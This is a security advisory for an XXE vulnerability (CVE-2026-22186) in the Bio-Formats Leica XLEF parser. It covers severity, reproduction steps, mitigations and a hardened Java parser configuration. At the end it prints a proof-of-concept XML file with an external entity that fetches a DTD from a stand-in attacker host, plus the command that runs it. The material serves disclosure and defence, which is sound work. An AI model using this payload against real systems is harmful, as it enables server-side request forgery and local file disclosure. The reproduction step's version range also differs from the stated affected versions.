Bio-Formats XXE in Leica Metadata Parser (CVE-2026-22186)
Authors: Beatriz Fresno Naumova, Ron Edgerson
Date: 18/03/2026 (Github Advisory)
Vendor: Open Microscopy Environment
Product: Bio-Formats
Version Affected: ≤ 8.4.0
Fixed Version: 8.5.0
Component: Leica metadata parser (XLEF)
CWE: CWE-611 – Improper Restriction of XML External Entity Reference
Attack Vector: Local
Bio-Formats versions up to and including 8.4.0 contain an XML External Entity (XXE) vulnerability in the Leica metadata parsing component (XLEF).
The parser uses an insecurely configured DocumentBuilderFactory that leaves external entity expansion and external DTD loading enabled. As a result, a specially crafted XLEF/XML metadata file can make the parser fetch external resources or read local files while it is being parsed.
Successful exploitation may allow:
Server-Side Request Forgery (SSRF) via outbound network requests
Access to local system resources (if readable)
Denial of Service (DoS) during XML parsing
CVSS v3.1 Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
Base Score: 7.1 (High)
1. Install a vulnerable version of Bio-Formats (≤ 8.3.0).
2. Prepare a malicious XLEF/XML file containing an external entity (the XML file shown below).
3. Execute the Bio-Formats analysis tool with the crafted file (the ImageInfo command shown below).
4. Observe outbound network requests or unintended resource access triggered during XML parsing.
Disable external entity processing in XML parsers.
Configure DocumentBuilderFactory securely:
  - enable FEATURE_SECURE_PROCESSING
  - disable DTDs and external entities
Validate and sanitize XML inputs before processing.
Update to the patched version (8.5.0) when available.
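The hardened DocumentBuilderFactory configuration the mitigation list describes, contrasted with the insecure default the description refers to, as an added example that is not Bio-Formats code. It assumes the JDK's built-in Xerces parser (the feature URIs are the standard Xerces/SAX ones); the class name, the placeholder DTD URL and both sample documents are constructed for the demonstration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

/** Hardened JAXP setup for parsing untrusted XML metadata such as XLEF (example, not Bio-Formats code). */
public final class SafeXmlMetadata {

    /** Returns a DocumentBuilder that cannot load DTDs or resolve external entities. */
    public static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Enable the JAXP secure-processing limits (entity expansion count, depth, ...).
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any <!DOCTYPE ...> outright; XXE needs a DTD, so this alone blocks it.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a different parser implementation ignores the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // JAXP 1.5 external-access properties: an empty string allows no protocol at all.
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        // No XInclude fetches and no entity-reference expansion in the DOM.
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses the bytes with the hardened builder; a document carrying a DOCTYPE is rejected. */
    public static Document parse(byte[] xml) throws Exception {
        return hardenedBuilder().parse(new ByteArrayInputStream(xml));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample 1: ordinary metadata without a DTD parses normally.
        String benign = "<?xml version=\"1.0\"?><root><image name=\"sample\"/></root>";
        Document ok = parse(benign.getBytes(StandardCharsets.UTF_8));
        System.out.println("benign root element: " + ok.getDocumentElement().getTagName());

        // Constructed sample 2: the shape of the advisory's PoC, with a placeholder URL.
        // The hardened parser throws on the DOCTYPE before any network or file access happens.
        String hostile = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://dtd.example.invalid/evil.dtd\">]>"
                + "<root>&xxe;</root>";
        try {
            parse(hostile.getBytes(StandardCharsets.UTF_8));
            System.out.println("UNEXPECTED: document with external entity was accepted");
        } catch (SAXParseException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Running the class prints the benign root element name and then the rejection message for the second document; with a plain `DocumentBuilderFactory.newInstance().newDocumentBuilder()` in place of `hardenedBuilder()`, the same second document would instead make the parser attempt to fetch the DTD, which is the behaviour the advisory describes. The `disallow-doctype-decl` feature is the one to rely on; the remaining settings only matter when a parser other than the JDK's Xerces is on the classpath and ignores it.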
Beatriz Fresno Naumova
Ron Edgerson
Bio-Formats (Github Advisory): https://github.com/ome/bioformats/security/advisories/GHSA-x9vc-qh97-8gj
Malicious XLEF/XML file referenced above (xxe_blind.xlef):

```xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">
]>
<root>&xxe;</root>
```

Bio-Formats ImageInfo command referenced above:

```shell
java -cp bioformats_package.jar \
  loci.formats.tools.ImageInfo xxe_blind.xlef
```